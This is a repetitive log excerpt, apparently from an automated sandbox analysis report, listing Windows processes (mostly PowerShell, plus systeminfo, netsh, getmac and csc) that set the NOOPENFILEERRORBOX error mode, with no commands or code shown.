              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
